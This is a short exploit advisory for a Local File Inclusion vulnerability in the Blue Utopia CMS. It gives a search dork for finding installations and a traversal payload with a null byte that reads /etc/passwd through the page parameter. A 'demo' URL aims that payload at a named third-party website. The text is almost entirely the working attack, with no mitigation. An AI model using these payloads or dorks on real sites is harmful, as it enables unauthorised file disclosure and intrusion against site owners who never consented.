#---------------------------------------------------------------------------------------------
# scriptname: Blue Utopia (all version)
# Vendor: http://blueutopia.com/
# vuln type: Local File Inclusion Vulnerability
# Author: PLATEN
# contact: PLATEN.Secure[at]Gmail.com
#---------------------------------------------------------------------------------------------

drok: "powered by Blue Utopia"

#----------------------------------------------------------------------------------------------

xpl:

http://127.0.0.1/path/index.php?page=[Lfi]%00
#----------------------------------------------------------------------------------------------

expl & demo

http://[victim[/index.php?page=../../../../../../../../../../../../../../..
/../../../../../../../../../etc/passwd%00

http://www.ohioyd.org/index.php?page=../../../../../../../../../../../../..
/../../../../../../../../../../../etc/passwd%00

#---------------------------------------------------------------------------------------------